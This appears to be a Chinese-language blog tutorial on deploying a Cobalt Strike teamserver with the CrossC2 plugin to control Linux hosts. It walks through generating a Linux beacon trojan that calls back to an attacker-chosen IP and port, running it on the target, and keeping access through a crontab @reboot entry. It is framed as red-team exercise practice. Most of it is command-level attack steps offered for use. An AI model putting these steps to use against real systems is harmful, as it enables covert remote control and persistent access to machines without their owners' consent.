Cobalt Strike 实现 Linux 主机的远程控制

在红蓝对抗中，为了长时间控制目标，Cobalt Strike 在处理 Windows 上线相对轻松，但对于 Linux 平台，我们需要借助第三方插件。

准备工作：

在此使用 CrossC2 插件，类似于在 Linux 上反弹一个类似 Cobalt Strike 的 shell。

GitHub 地址：https://github.com/gloxec/CrossC2

请注意下载适配你 Cobalt Strike 版本的文件（此处使用 3.0.2 的最新版插件，Cobalt Strike 版本为 4.3）。

需要下载以下两个文件：

• CrossC2***.cna
• genCrossC2.Linux

由于生成木马的平台是 Linux，因此使用 genCrossC2.Linux，根据你的平台选择相应文件。

服务端部署：

Cobalt Strike 服务端部署：

<code>chmod +x teamserver ./teamserver [ip] [password]</code>

客户端连接：

建立一个监听器，注意 CrossC2 插件只支持 HTTPS Beacon。

安装 CrossC2：

生成木马：

如果在服务端生成，直接在 Cobalt Strike 目录执行：

<code>chmod +x genCrossC2.Linux ./genCrossC2.Linux [ip] [port] ./.cobaltstrike.beacon_keys null Linux x64 /tmp/test</code>

如果在非服务端生成，需将服务端根目录的隐藏文件 .cobaltstrike.beacon_keys 复制到 Cobalt Strike 根目录。

上线：

在目标靶机上运行生成的木马：

<code>chmod +x test ./test</code>

权限维持：

一个简单的思路是将其添加到系统启动项。通过计划任务实现是其中一种简便方法：

<code>crontab -e @reboot /tmp/test</code>

请确保设置了下次登录用户的 crontab。